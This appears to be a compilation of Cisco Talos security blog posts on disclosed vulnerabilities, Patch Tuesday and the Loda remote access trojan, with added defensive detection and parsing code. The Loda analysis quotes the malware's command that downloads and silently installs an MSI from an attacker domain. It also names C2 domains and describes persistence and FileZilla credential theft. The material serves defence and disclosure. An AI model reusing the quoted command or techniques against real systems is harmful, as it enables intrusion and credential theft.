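One way to turn the "Excessively long PowerShell command" heuristic above into detection logic, as an added example that is not Talos code: it scans constructed process-creation events, flags PowerShell command lines that exceed an assumed length threshold or carry a Base64 -EncodedCommand payload, and decodes that payload for the analyst. The tab-separated log format, the threshold and the sample events are all assumptions.

```python
import base64
from dataclasses import dataclass
import re
from typing import List, Optional, Tuple

# Assumed threshold in characters; baseline it against your own admin scripts.
LONG_CMDLINE_THRESHOLD = 400

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_RE = re.compile(
    r"(?i)(?<!\S)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
)


@dataclass
class Finding:
    line_no: int
    image: str
    reasons: List[str]
    decoded: Optional[str]


def decode_payload(b64: str) -> Optional[str]:
    """-EncodedCommand carries UTF-16LE script text in Base64; None if it won't decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def analyze_cmdline(cmdline: str) -> Tuple[List[str], Optional[str]]:
    """Return the reasons to alert (empty if nothing stands out) and any decoded script."""
    reasons: List[str] = []
    decoded = None
    if len(cmdline) > LONG_CMDLINE_THRESHOLD:
        reasons.append("long_command_line")
    match = ENCODED_RE.search(cmdline)
    if match:
        reasons.append("encoded_command")
        decoded = decode_payload(match.group(1))
        if decoded is None:
            reasons.append("undecodable_payload")   # still worth an analyst's look
        elif len(decoded) > LONG_CMDLINE_THRESHOLD:
            reasons.append("long_decoded_script")   # obfuscation hidden behind -enc
    return reasons, decoded


def scan(lines: List[str]) -> List[Finding]:
    """Walk 'timestamp<TAB>image<TAB>commandline' events; only PowerShell images are judged."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        parts = line.rstrip("\n").split("\t", 2)
        if len(parts) != 3:
            continue
        _ts, image, cmdline = parts
        if not image.lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
            continue
        reasons, decoded = analyze_cmdline(cmdline)
        if reasons:
            findings.append(Finding(line_no, image, reasons, decoded))
    return findings


# Constructed sample events (not real telemetry).
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_SCRIPT = "Write-Output 'hello from encoded'"
ENCODED_B64 = base64.b64encode(ENCODED_SCRIPT.encode("utf-16le")).decode("ascii")
LONG_CMD = "powershell.exe -NoProfile -Command " + ";".join(
    f"$v{i}='AAAAAAAA'" for i in range(40))
SAMPLE_LOGS = [
    f"2020-02-11T09:00:00Z\t{PS_IMAGE}\tpowershell.exe -NoProfile -Command Get-Service",
    f"2020-02-11T09:00:01Z\t{PS_IMAGE}\t{LONG_CMD}",
    f"2020-02-11T09:00:02Z\t{PS_IMAGE}\tpowershell.exe -NoProfile -enc {ENCODED_B64}",
    "2020-02-11T09:00:03Z\tC:\\Windows\\System32\\msiexec.exe\tmsiexec.exe /i " + "x" * 600,
    f"2020-02-11T09:00:04Z\t{PS_IMAGE}\tpowershell.exe -e " + "A" * 17,
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f.line_no}: {', '.join(f.reasons)}")
        if f.decoded:
            print("  decoded:", f.decoded)
```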

Vulnerability Spotlight: Accusoft ImageGear library code execution vulnerabilities

Emmanuel Tacheau of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

Cisco Talos recently discovered three code execution vulnerabilities in Accusoft ImageGear. The ImageGear library is a document-imaging developer toolkit to assist users with image conversion, creation, editing and more. There are vulnerabilities in certain functions of ImageGear that could allow an attacker to execute code on the victim machine.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Accusoft to ensure that these issues are resolved and that an update (link will generate a download) is available for affected customers.

Vulnerability details

Accusoft ImageGear TIFF TIF_read_stripdata code execution vulnerability (TALOS-2019-0972/CVE-2019-5187)

An exploitable out-of-bounds write vulnerability exists in the TIF_read_stripdata function of the igcore19d.dll library of Accusoft ImageGear 19.5.0. A specially crafted TIFF file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Accusoft ImageGear PCX uncompress_scan_line buffer size computation code execution vulnerability (TALOS-2020-0986/CVE-2020-6063)

An exploitable out-of-bounds write vulnerability exists in the `uncompress_scan_line` function of the igcore19d.dll library of Accusoft ImageGear, version 19.5.0. A specially crafted PCX file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Accusoft ImageGear PCX uncompress_scan_line buffer copy operation code execution vulnerability (TALOS-2020-0987/CVE-2020-6064)

An exploitable out-of-bounds write vulnerability exists in the `uncompress_scan_line` function of the igcore19d.dll library of Accusoft ImageGear, version 19.5.0. A specially crafted PCX file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.
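As an added illustration (not ImageGear code, and no claim about how its uncompress_scan_line is written): a minimal PCX scan-line decoder whose two checks sit where the two advisories above report out-of-bounds writes, the line-buffer size computation from the header and the RLE copy into that buffer. Header offsets follow the published PCX format; the sanity limit and the sample image are assumptions.

```python
import struct
from typing import List, Tuple

PCX_HEADER_LEN = 128
MAX_SCANLINE_BYTES = 1 << 20   # assumed upper bound; rejects absurd headers up front


class PcxError(ValueError):
    """Malformed headers and RLE streams are rejected, never written out of bounds."""


def parse_header(data: bytes) -> Tuple[int, int]:
    """Validate the header and return (height, line_len) for the scan-line buffer."""
    if len(data) < PCX_HEADER_LEN:
        raise PcxError("truncated header")
    manufacturer, _ver, encoding, bpp, xmin, ymin, xmax, ymax = struct.unpack_from(
        "<BBBBHHHH", data, 0)
    planes, bytes_per_line = struct.unpack_from("<BH", data, 65)
    if manufacturer != 0x0A or encoding != 1:
        raise PcxError("not an RLE-encoded PCX file")
    if xmax < xmin or ymax < ymin or planes not in (1, 3, 4) or bpp not in (1, 2, 4, 8):
        raise PcxError("inconsistent header fields")
    width, height = xmax - xmin + 1, ymax - ymin + 1
    # Size computation: the line buffer is bytes_per_line * planes and every pixel the
    # header promises must fit in it; sizing from one field and writing by the other overflows.
    if bytes_per_line * 8 < width * bpp:
        raise PcxError("bytes_per_line too small for width")
    line_len = bytes_per_line * planes
    if line_len > MAX_SCANLINE_BYTES:
        raise PcxError("scan line too large")
    return height, line_len


def decode_scan_line(data: bytes, pos: int, line_len: int) -> Tuple[bytes, int]:
    """Decode one RLE scan line starting at pos; every copy is bounded by line_len."""
    out = bytearray()
    while len(out) < line_len:
        if pos >= len(data):
            raise PcxError("truncated scan line")
        b = data[pos]
        pos += 1
        if b & 0xC0 == 0xC0:                 # top two bits set: run of (b & 0x3F) bytes
            count = b & 0x3F
            if pos >= len(data):
                raise PcxError("run without value byte")
            value = data[pos]
            pos += 1
        else:                                # plain literal byte
            count, value = 1, b
        # Copy operation: a run must never extend past the end of the line buffer.
        if len(out) + count > line_len:
            raise PcxError("RLE run overflows scan line")
        out.extend(bytes((value,)) * count)
    return bytes(out), pos


def decode_pcx(data: bytes) -> List[bytes]:
    """Return the decoded scan lines, raising PcxError on any inconsistency."""
    height, line_len = parse_header(data)
    pos, lines = PCX_HEADER_LEN, []
    for _ in range(height):
        line, pos = decode_scan_line(data, pos, line_len)
        lines.append(line)
    return lines


def check_file(data: bytes) -> str:
    """'ok' if the file decodes cleanly, otherwise the rejection reason (for triage)."""
    try:
        decode_pcx(data)
        return "ok"
    except PcxError as exc:
        return str(exc)


def encode_scan_line(raw: bytes) -> bytes:
    """Tiny RLE encoder, used only to build the constructed sample below."""
    out, i = bytearray(), 0
    while i < len(raw):
        j = i
        while j < len(raw) and raw[j] == raw[i] and j - i < 63:
            j += 1
        count = j - i
        if count > 1 or raw[i] & 0xC0 == 0xC0:   # literals >= 0xC0 must be escaped
            out += bytes((0xC0 | count, raw[i]))
        else:
            out.append(raw[i])
        i = j
    return bytes(out)


def build_pcx(rows: List[bytes], bytes_per_line: int) -> bytes:
    """Build an 8-bpp, single-plane PCX from raw rows (constructed input)."""
    width, height = len(rows[0]), len(rows)
    hdr = bytearray(PCX_HEADER_LEN)
    struct.pack_into("<BBBBHHHH", hdr, 0, 0x0A, 5, 1, 8, 0, 0, width - 1, height - 1)
    struct.pack_into("<BH", hdr, 65, 1, bytes_per_line)
    body = b"".join(encode_scan_line(r.ljust(bytes_per_line, b"\0")) for r in rows)
    return bytes(hdr) + body


SAMPLE_ROWS = [bytes([0x10] * 4), bytes([0xC1, 0x02, 0x02, 0x02])]   # constructed 4x2 image
SAMPLE_PCX = build_pcx(SAMPLE_ROWS, 4)
```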

Versions tested

Talos tested and confirmed that version 19.5.0 of Accusoft ImageGear is affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 52490 - 52493, 53015, 53016, 53032 - 53035

Introducing Cisco Talos Incident Response: Stories from the Field

By Jon Munshaw.

As another way of bringing our boots-on-the-ground intelligence to defenders, customers and users, we are introducing a new video series called "Cisco Talos Incident Response: Stories from the Field."

In each entry, a CTIR team member will cover one specific incident or lesson that they feel can be applicable to the everyday defender. First up is Pierre Cadieux, who recalls a recent incident at a health care company. He walks through the containment of the attack and recounts some lessons from that event he shares with other customers.

You can watch the full video above. To learn more about Talos Incident Response, click here.

Vulnerability Spotlight: Information leak vulnerability in Adobe Acrobat Reader’s JavaScript function

Aleksandar Nikolic of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Cisco Talos recently discovered an information leak vulnerability in Adobe Acrobat Reader. Acrobat supports a number of features, including the ability to process embedded JavaScript. An attacker could trigger this vulnerability by tricking a user into opening a malicious file or web page with embedded JavaScript in a PDF. The attacker could then gain access to sensitive information, which could then be used in additional attacks.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Adobe Acrobat Reader DC JavaScript field name information leak (TALOS-2019-0959/CVE-2020-3744)

A specific JavaScript code embedded in a PDF file can lead to an information leak when opening a PDF document in Adobe Acrobat Reader DC, version 2019.021.20048. This could allow an attacker to view sensitive information, which could be abused when exploiting another vulnerability to bypass mitigations. The victim would need to open the malicious file or access a malicious web page to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that version 2019.021.20048 of Adobe Acrobat Reader DC is affected by this vulnerability.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 52331, 52332

Microsoft Patch Tuesday — Feb. 2020: Vulnerability disclosures and Snort coverage

By Jon Munshaw.

Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 98 vulnerabilities, 12 of which are considered critical and 84 that are considered important. There are also two bugs that were not assigned a severity.

This month's patches include updates to the Windows kernel, the Windows scripting engine and Remote Desktop Protocol, among other software and features. Microsoft also provided a critical advisory covering updates to Adobe Flash Player.

Talos released a new set of SNORTⓇ rules today that provide coverage for some of these vulnerabilities, which you can see here.

Critical vulnerabilities

Microsoft disclosed 12 critical vulnerabilities this month, all of which we will highlight below.

CVE-2020-0673, CVE-2020-0674, CVE-2020-0710, CVE-2020-0711, CVE-2020-0712, CVE-2020-0713 and CVE-2020-0767 are all memory corruption vulnerabilities in the Microsoft scripting engine that deals with how Internet Explorer handles objects in memory. An attacker could use these vulnerabilities to corrupt memory on the victim machine in a way that would allow them to execute arbitrary code. A user could trigger this bug by visiting an attacker-controlled web page on Internet Explorer that's been specially crafted to exploit this vulnerability. Alternatively, an attacker could embed an ActiveX control marked "safe for initialization" in another application or Microsoft Office document that utilizes the Internet Explorer rendering engine and convince the victim to open that file.

CVE-2020-0681 and CVE-2020-0734 are remote code execution vulnerabilities in Remote Desktop Protocol when the user connects to a malicious server. An attacker can exploit these vulnerabilities by hosting a server, and convincing a user to connect to it, likely via social engineering or a man-in-the-middle technique.

CVE-2020-0662 is a remote code execution vulnerability in Windows 10 and some versions of Windows Server that exists in the way the software handles objects in memory. If successfully exploited, this vulnerability could allow an attacker to execute arbitrary code with elevated permissions on the victim machine. The attacker would need a domain user account, and then create a specially crafted request.

CVE-2020-0729 is a remote code execution vulnerability in Windows that could allow an attacker to remotely execute code if Windows processes a specially crafted .LNK file. An adversary could exploit this vulnerability by sending the user a removable drive or remote share containing a malicious .LNK file and an associated malicious binary. If the user opens the file in Windows Explorer or another application that parses .LNK files, the binary will execute code of the attacker's choice.

CVE-2020-0738 is a memory corruption vulnerability in Windows Media Foundation that exists in the way the software handles objects in memory. An attacker could exploit this bug by convincing the user to open a specially crafted, malicious file or web page, which would corrupt memory in a way the attacker could then install programs, manipulate user data or create new user accounts on the victim machine.

                Important vulnerabilities

                This release also contains 84 important vulnerabilities:

                Other vulnerabilities

                There are two other vulnerabilities, CVE-2020-0693 and CVE-2020-0702, for which Microsoft did not assign a severity.

                Coverage 

                In response to these vulnerability disclosures, Talos is releasing a new SNORTⓇ rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

These rules are: 48701, 48702, 53050 - 53056, 53061, 53072, 53073, 53079 - 53089

                Vulnerability Spotlight: Code execution vulnerability in Microsoft Excel


                Marcin Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

                Microsoft Excel contains a code execution vulnerability. This specific bug lies in the component of Excel that handles the Microsoft Office HTML and XML file types, first introduced in Office 2000. Microsoft disclosed this vulnerability in this month’s Patch Tuesday. For more on the updates Microsoft released, read Talos’ full blog here.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.


                Vulnerability details

                Microsoft Office Excel Ordinal43 code execution vulnerability (TALOS-2019-0968/CVE-2020-0759)

                An exploitable use-after-free vulnerability exists in Excel in Microsoft Office Professional Plus 2016 x86, version 1909, build 12026.20334 and Microsoft Office 365 ProPlus x86, version 1902, build 11328.20480. A specially crafted XLS file can cause a use after free condition, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that this vulnerability affects Microsoft Office Professional Plus 2016 x86, version 1909, build 12026.20334 and Microsoft Office 365 ProPlus x86, version 1902, build 11328.20480.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 52417, 52418

                Vulnerability Spotlight: Code execution vulnerability in Microsoft Media Foundation


                Marcin Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

                Microsoft Media Foundation’s framework contains a code execution vulnerability. This specific bug lies in Media Foundations’ MPEG4 DLL. An attacker could provide a user with a specially crafted ASF file to exploit this vulnerability. Microsoft disclosed this vulnerability in this month’s Patch Tuesday. For more on the updates Microsoft released, read Talos’ full blog here.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.


                Vulnerability details

                Microsoft Media Foundation IMFASFSplitter::Initialize code execution vulnerability (TALOS-2019-0946/CVE-2020-0738)

An exploitable type confusion vulnerability exists in the mfasfsrcsnk.dll of Microsoft Media Foundation 10.0.18362.207. A specially crafted ASF file can cause type confusion, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

Talos tested and confirmed that this vulnerability affects the 32- and 64-bit versions of Windows 10 Media Foundation ASF Source and Sink DLL, version 10.0.18362.207 (WinBuild.160101.0800).

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 52095, 52096

                Vulnerability Spotlight: Use-after-free vulnerability in Windows 10 win32kbase


                Marcin Towalski of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

                Cisco Talos is releasing the details of a use-after-free vulnerability in Windows 10. An attacker could exploit this vulnerability to gain the ability to execute arbitrary code in the kernel context. Microsoft disclosed this vulnerability in this month’s Patch Tuesday. For more on the updates Microsoft released, read Talos’ full blog here.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.

                Vulnerability details

                Windows 10 win32kbase HMMarkObjectDestroy arbitrary code execution vulnerability (TALOS-2019-0970/CVE-2020-0731)

                A use after free vulnerability exists in Windows 10, Version 10.0.19033.1, when a Win32k component fails to properly handle objects in memory. Successful exploitation of this vulnerability can lead to arbitrary code execution in the kernel context and elevation of privileges. This vulnerability occurs only on an x86 machine.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that this vulnerability affects Microsoft Windows 10, version 10.0.19033.1, Insider Preview Fast running on an x86 machine.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 52432, 52433

                Vulnerability Spotlight: Remote code execution vulnerability in Apple Safari


                Marcin Towalski of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

The Apple Safari web browser contains a remote code execution vulnerability in its Fonts feature. If a user were to open a malicious web page in Safari, they could trigger a type confusion, resulting in memory corruption and possibly arbitrary code execution. An attacker would need to trick the user into visiting the web page by some means to trigger this vulnerability.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with Apple to ensure that these issues are resolved and that an update is available for affected customers.

                Vulnerability details

                Apple Safari FontFaceSet remote code execution vulnerability (TALOS-2019-0967/CVE-2020-3868)

                A type confusion vulnerability exists in the Fonts feature of Apple Safari, version 13.0.3. A specially crafted HTML web page can cause a type confusion, resulting in memory corruption and possibly arbitrary code execution. To trigger this vulnerability, the target application needs to process a specially crafted HTML web page.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that this vulnerability affects Safari, version 13.0.3 (15608.3.10.1.4); Safari technology preview release 96 (Safari 13.1, WebKit 15609.1.9.7) and Webkit GIT e4cd3b4fab6166d1288984ded40c588439dab925.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 52415, 52416

                Loda RAT Grows Up


                By Chris Neal.

                • Over the past several months, Cisco Talos has observed a malware campaign that utilizes websites hosting a new version of Loda, a remote access trojan (RAT) written in AutoIT.
                • These websites also host malicious documents that begin a multi-stage infection chain which ultimately serves a malicious MSI file. The second stage document exploits CVE-2017-11882 to download and run the MSI file, which contains Loda version 1.1.1.
                • This campaign appears to be targeting countries in South America and Central America, as well as the U.S.

                What's New?


                Talos has observed several changes in this version of Loda. The obfuscation technique used within the AutoIT script changed to a different form of string encoding. Multiple persistence mechanisms have been employed to ensure Loda continues running on the infected host following reboots. Lastly, the new version leverages WMI to enumerate antivirus solutions running on the infected host.





                How Did it Work?


The Loda sample analyzed in this post is delivered via a document chain. The first document contains an OOXML relationship to a second document that contains an exploit. Once the exploit is triggered, an MSI file that contains the Loda RAT is downloaded to the target host and executed. While the main purpose of this RAT is to steal usernames, passwords and cookies saved within browsers, it also supports keylogging, sound recording and screenshotting, and it allows the threat actor to send messages to the infected host.

                So What?

                Loda is a simple, yet effective, RAT that has matured over time. This RAT is a good example of how effective relatively simple techniques combined with basic obfuscation can be. The techniques this malware employs are of fairly low complexity and show that slight changes in implementation can significantly reduce detection rates.

                The Campaign


                Telemetry from Cisco Umbrella shows that this campaign is quite active and seems to be targeting countries in South America, Central America and the U.S. The majority of the queries to the C2 domain "4success[.]zapto[.]org" originate from Brazil, Costa Rica and the United States. Similarly, the queries to "success20[.]hopto[.]org" originate from Argentina, Brazil and the United States. Our telemetry also shows that C2 communications go as far back as the last quarter of 2019.


                DNS queries to 4success[.]zapto[.]org

                DNS queries to success20[.]hopto[.]org


                Infection chain

                At the time of analysis, several steps of the infection chain had a relatively low detection rate due to various obfuscation techniques. The initial document is delivered via a phishing email that contains the first-stage document as an attachment.

                Example of an email from this campaign

                The first document in the infection chain, titled in one instance "comprobante de confirmación de pago.docx" contains an OOXML relationship, located in "/word/_rels" that points to a second document at "http://lcodigo[.]com/apiW/config/uploads/tmp/documento.doc". Aside from this OOXML relationship, the initial document isn't particularly noteworthy. The document uses this two-stage document technique to bypass some email filters.

                OOXML Relationship
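The two-stage delivery described above hinges on a single `Relationship` element with `TargetMode="External"` inside the package's `.rels` parts. The following is an added example (not code from the Talos post or from the Loda campaign) of how a defender can triage a `.docx` for such relationships offline: it walks every `.rels` part in the ZIP container, reports each external target, and rates ordinary hyperlinks lower than relationship types that make Office fetch and render a second file. The sample document it builds is constructed for the example, and the `example.invalid` URLs are placeholders, not indicators from the campaign.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespace of every .rels part inside an OOXML package (docx, xlsx, pptx).
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def find_external_relationships(docx_bytes):
    """Return every relationship in the package whose TargetMode is External.

    Hyperlinks are external by design and are reported as low severity; any
    other external relationship (attachedTemplate, oleObject, frame, ...)
    makes Office fetch a second file from the network when the document is
    opened, which is the two-stage delivery the Loda campaign relies on.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as package:
        for part_name in package.namelist():
            if not part_name.endswith(".rels"):
                continue
            root = ET.fromstring(package.read(part_name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append({
                    "part": part_name,
                    "id": rel.get("Id"),
                    "type": rel_type,
                    "target": rel.get("Target"),
                    "severity": "low" if rel_type == "hyperlink" else "high",
                })
    return findings


def build_sample_docx():
    """Constructed minimal .docx (not a real sample): one benign hyperlink,
    one internal styles relationship and one external attachedTemplate
    relationship pointing at a placeholder host."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%shyperlink" '
        'Target="https://example.invalid/" TargetMode="External"/>'
        '<Relationship Id="rId2" Type="%sattachedTemplate" '
        'Target="http://example.invalid/tmp/documento.doc" TargetMode="External"/>'
        '<Relationship Id="rId3" Type="%sstyles" Target="styles.xml"/>'
        '</Relationships>'
    ) % (RELS_NS, OFFICE_REL, OFFICE_REL, OFFICE_REL)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as package:
        package.writestr("[Content_Types].xml", "<Types/>")
        package.writestr("word/document.xml", "<document/>")
        package.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in find_external_relationships(build_sample_docx()):
        print("%(severity)s  %(part)s  %(type)s -> %(target)s" % finding)
```

Running the check over a mail gateway's quarantined attachments gives a cheap first filter: a document whose only external targets are hyperlinks is unremarkable, while an external `attachedTemplate`, `oleObject` or `frame` target on a business document is worth detonating before release.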

                The second document is a Rich Text Format document that contains a payload within an obfuscated OLE object which is then executed by exploiting CVE-2017-11882, an arbitrary code execution vulnerability in some versions of Microsoft Office. The contents of the Author field, "obidah qudah" in the metadata of this document appears to be constant across all samples analyzed during the investigation.

                When we looked deeper into this author's name, we discovered they have a relatively long history of being associated with malicious RTF documents. Starting in 2017, there have been just under 1,300 malicious documents submitted to VirusTotal that contain "obidah qudah" in the author field. An overwhelming majority of these submissions are RTF documents that exploit CVE-2017-11882.

                However, the "Last Modified By" field is not static throughout these documents. There appear to be multiple campaigns over the last few years, starting in 2017, that use the "obidah qudah" author name, with each campaign using a different "Last Modified By" field, with many serving malware other than Loda. It is unclear whether these campaigns were initiated by the same threat actor, or if a single malicious RTF document builder was used by multiple different actors. In the documents analyzed in this post, the "Last Modified By" value is set to "Richard."

                Author labeled as "obidah qudah"

                The OLE object within this document that contains the exploit and payload employs an interesting obfuscation technique that utilizes RTF control words.

                Obfuscated payload

The control word "\par" used in the object indicates the end of a paragraph, while "\*" has a slightly more complex function. The "\*" control word instructs an RTF reader to ignore the control word that follows it if the reader does not understand it, which allows the author to include false control words (e.g., \par67234). Using this technique to break up the OLE object not only obfuscates the payload but also prevents RTF parsers from reading the object in its entirety. Once the document is opened, the control words are ignored and the bytes between them are concatenated into the exploit payload, as shown below.

                Deobfuscated payload

                Within this payload, the command "cmd.exe & /C CD C: & msiexec.exe /i http://lcodigo[.]com/apiW/config/uploads/tmp/fkrkdn.msi /quiet" can be seen. Once the exploit is triggered, a malicious MSI file is then downloaded and executed.
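The analysis above rests on two parsing steps: pulling the author and "Last Modified By" fields out of the RTF `\info` group for pivoting, and reassembling the embedded object's hex data while discarding the bogus `\*\parNNNN` control words. The block below is an added example written for this post, not Talos tooling or any code from the campaign. It reads `\objdata` the way an RTF reader does (every control word dropped, only hex digits kept), decodes the OLE 1.0 object header to recover the embedded object's class name, and extracts the `\info` fields. The RTF it operates on is constructed for the example; the `\operator` field is RTF's name for the last editor, and the hex data is a harmless header plus four filler bytes, not a payload.

```python
import binascii
import re
import struct

# An RTF control word is a backslash, letters, an optional signed number and
# an optional delimiting space; "\*" marks the next destination as ignorable.
CONTROL_WORD = re.compile(r"\\\*|\\[a-zA-Z]+-?\d*\s?")
OBJDATA = re.compile(r"\\objdata\b")

# Constructed sample, not a document from the campaign: the \info block
# carries the author and last-editor names quoted in the post, and the
# object's hex data is broken up with bogus "\*\parNNNN" control words.
SAMPLE_RTF = (
    r"{\rtf1\ansi{\info{\author obidah qudah}{\operator Richard}}"
    r"{\object\objemb{\*\objdata 01050000\*\par67234 02000000\*\par1188 "
    r"0b000000\*\par99 4571756174696f6e2e3300\*\par5 00000000 00000000 "
    r"04000000 deadbeef}}\par}"
)


def _group_body(rtf, start):
    """Text from `start` up to the brace that closes the group already open."""
    depth = 0
    for i in range(start, len(rtf)):
        if rtf[i] == "{":
            depth += 1
        elif rtf[i] == "}":
            if depth == 0:
                return rtf[start:i]
            depth -= 1
    return rtf[start:]


def info_field(rtf, field):
    """Value of an \\info field such as author or operator (last editor)."""
    m = re.search(r"\\%s\s+([^\\{}]+)" % re.escape(field), rtf)
    return m.group(1).strip() if m else None


def extract_objdata(rtf):
    """Recover each embedded object's bytes the way an RTF reader sees them:
    drop every control word inside \\objdata and keep only the hex digits."""
    blobs = []
    for m in OBJDATA.finditer(rtf):
        body = _group_body(rtf, m.end())
        hexdata = re.sub(r"[^0-9A-Fa-f]", "", CONTROL_WORD.sub("", body))
        blobs.append(binascii.unhexlify(hexdata[: len(hexdata) & ~1]))
    return blobs


def ole1_class_name(blob):
    """Class name from an OLE 1.0 object header (OLEVersion, FormatID,
    ClassName length, ClassName); None if the header is malformed."""
    if len(blob) < 12:
        return None
    _version, format_id, name_len = struct.unpack("<III", blob[:12])
    if format_id not in (1, 2) or len(blob) < 12 + name_len:
        return None
    return blob[12:12 + name_len].rstrip(b"\x00").decode("ascii", "replace")


if __name__ == "__main__":
    print("author:", info_field(SAMPLE_RTF, "author"))
    print("last editor:", info_field(SAMPLE_RTF, "operator"))
    for blob in extract_objdata(SAMPLE_RTF):
        print("object class:", ole1_class_name(blob), "size:", len(blob))
```

The class name is the useful triage output: an object that declares the Equation Editor class in a document arriving by email is exactly what the CVE-2017-11882 detections in the Coverage section key on, and the author/operator pair is what lets an analyst cluster samples across campaigns as the post does.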

                This MSI was created using Exe2Msi, a common tool used to repackage Windows executables as an MSI file. Although this tool is most often used with legitimate software, it is also frequently used by malware authors. One of the benefits of delivering malware in an MSI package is that it provides a lower detection rate. Simply repackaging a malicious executable as an MSI file can reduce detection rates with very little effort. If repackaged as an MSI, the detection rate of a malicious executable can drop by up to 50 percent on VirusTotal. Combined with other forms of obfuscation, this can result in a crude, yet effective, means of evasion.

                The malware


                At execution, "fkrkdn.msi" extracts an executable at "C:\Users\<user>\AppData\Roaming\Windata\JLMWFF.exe." This is the Loda 1.1.1 binary, which is a compiled AutoIT script. A detailed write-up by Proofpoint on a previous version of Loda and its functionality can be found here.

The initial C2 beacon captured from "JLMWFF.exe" contained the unique signature "ZeXro0" repeated several times, which is not present in other versions of Loda. The C2 communications to "4success[.]zapto[.]org" contain information about the infected host, including OS version, architecture and username, and also reveal that this version of Loda is "1.1.1." Aside from the unique signature, this beacon format is the same as in previous versions.

                Even though this new version of Loda has nearly identical functionality as previous versions, there are significant differences in implementation and design. Some of the functions within the script have been completely rewritten, with the most readily apparent change being the obfuscation technique used. In version 1.1.1, almost every string or variable is obfuscated using the simple encoding algorithm shown below.

                Loda's encoding algorithm

                There are a few key changes in functionality in version 1.1.1. To detect what antivirus software is running on the host, earlier versions of Loda would call the AutoIT function PROCESSEXISTS() for each antivirus software process name. Loda 1.1.1 now makes a WMI query to "winmgmts:\\localhost\root\SecurityCenter2" to enumerate installed antivirus solutions, as shown below in the deobfuscated code:

                AV enumeration function

                For persistence, the new version now adds both a registry key and a scheduled task:

                Persistence mechanism

                A new capability this version has is the ability to read the contents of "\filezilla\recentservers.xml". This document contains the IP addresses, usernames and passwords of servers that Filezilla has recently connected to. It is important to note that these passwords are stored in either plaintext or encoded in base64.
